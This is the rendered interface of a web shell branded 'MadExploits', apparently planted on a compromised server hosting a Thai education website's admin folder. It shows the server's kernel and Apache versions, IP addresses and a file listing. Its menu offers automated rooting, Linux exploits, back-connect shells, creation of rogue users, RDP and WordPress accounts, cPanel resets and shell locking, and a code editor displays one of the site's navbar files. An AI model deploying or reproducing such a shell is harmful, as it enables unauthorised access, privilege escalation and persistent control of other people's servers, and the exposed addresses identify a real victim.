Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 3.132.213.245
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
myeducation.co.th /
admin /
[ HOME SHELL ]
Name
Size
Permission
Action
2Navbar_Side
[ DIR ]
drwxr-xr-x
DropDownCategory
[ DIR ]
drwxr-xr-x
PageWrapper
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxr-xr-x
1First_Head.php
4.92
KB
-rw-r--r--
2Nav_BarTop.php
4.05
KB
-rw-r--r--
2Navbar_Side.php
2.65
KB
-rw-r--r--
3Page_Wrapper.php
1.76
KB
-rw-r--r--
4End_Head.php
943
B
-rw-r--r--
Article.php
663
B
-rw-r--r--
ArticleEdit.php
535
B
-rw-r--r--
Home.php
1.3
KB
-rw-r--r--
HomeEdit.php
534
B
-rw-r--r--
Management_Menu.php
1.3
KB
-rw-r--r--
Management_Menu_Create_Form.ph...
808
B
-rw-r--r--
MemberList.php
534
B
-rw-r--r--
Product.php
884
B
-rw-r--r--
ProductCategoryEdit.php
544
B
-rw-r--r--
ProductCategoryEdit2.php
545
B
-rw-r--r--
ProductCategoryEdit3.php
545
B
-rw-r--r--
ProductEdit.php
535
B
-rw-r--r--
Product_Category.php
549
B
-rw-r--r--
Product_Category2.php
550
B
-rw-r--r--
Product_Category3.php
550
B
-rw-r--r--
Register.php
532
B
-rw-r--r--
RegisterEdit.php
536
B
-rw-r--r--
Schedule.php
714
B
-rw-r--r--
ScheduletEdit.php
537
B
-rw-r--r--
Setting.php
540
B
-rw-r--r--
amphur.php
497
B
-rw-r--r--
amphurEdit.php
535
B
-rw-r--r--
contact.php
582
B
-rw-r--r--
contactview.php
539
B
-rw-r--r--
index.php
1.11
KB
-rw-r--r--
login.php
1.73
KB
-rw-r--r--
showpage.php
541
B
-rw-r--r--
showpageEdit.php
536
B
-rw-r--r--
system_payment.php
728
B
-rw-r--r--
upload_file.php
1.05
KB
-rw-r--r--
upload_image.php
1.78
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 2Navbar_Side.php
<nav class="navbar-default navbar-static-side" role="navigation"> <div class="sidebar-collapse"> <ul class="nav" id="side-menu"> <a href="Home.php?SN=<?=$sesMemberSubName;?>&ID=<?=$sesMemberID;?>"> <li> <div class="user-section"> <div class="user-section-inner"> <img src="../model/assets/img/user.jpg" alt=""> </div> <div class="user-info"> <div> <strong><?=$sesMemberNameEN?></strong></div> <div class="user-text-online"> <span class="user-circle-online btn btn-success btn-circle "></span> ONLINE </div> </div> </div> </li> </a> <li class="selected"> <a href="Home.php"><i class="fa fa-dashboard fa-fw"></i> DASH BOARD </a> </li> <li> <ul class="nav nav-second-level"> <?PHP if($sesPositionID == 1 OR $sesPositionID ==2){ ?> <?PHP } ?> <li><a href="MemberList.php"> <i class="glyphicon glyphicon-user"></i> ADMIN INFORMATION</a></li> <li> <a href="contact.php"> <i class="fa fa-envelope-open-o" aria-hidden="true"></i> CUSTOMER CONTACT </a> </li> <!-- <li> <a href="order.php?status=List"> <i class="fa fa-shopping-bag" aria-hidden="true"></i> ORDER PRODUCT </a> </li> --> <!-- <li> <a href="Article.php?ArticleProfile=0"> <i class="fa fa-download" aria-hidden="true"></i> DOWNLOAD </a> </li> --> <!-- <li> <a href="booking.php?status=List"> <i class="fa fa-calendar" aria-hidden="true"></i> Booking </a> </li> --> </ul> </li> <?PHP if($sesPositionID ==1 OR $sesPositionID ==2){ include '2Navbar_Side/2Navbar_Side_Part_Admin_Owner.php'; }else{ ?> <li><a href="MemberList.php"> MANAGE USERS </a></li> <?PHP } ?> <ul class="nav nav-second-level"> <li> <a href="../model/controller/SignOut.php" onClick="return confirm('Do you want to Sign Out?');"> <i class="glyphicon glyphicon-minus-sign"></i> SIGN OUT </a> </li> </ul> <br/> <div class="text-center"> <em style="color: #c7e8ff;"> DEVELOPED BY <a href="http://www.siamwebsite.me/" target="_blank" style="color: #c7e8ff;">siamwebsite.me </a></em> </div> <div class="text-center"> <em style="color: #c7e8ff;" >BOOKING AND E-COMMERCE , DETAIL CATEGORY </em></div> <div class="text-center"> <em style="color: #c7e8ff;"> MARACAR VERSION 0.4.2.5 </em></div> </ul> </div> </nav>
Close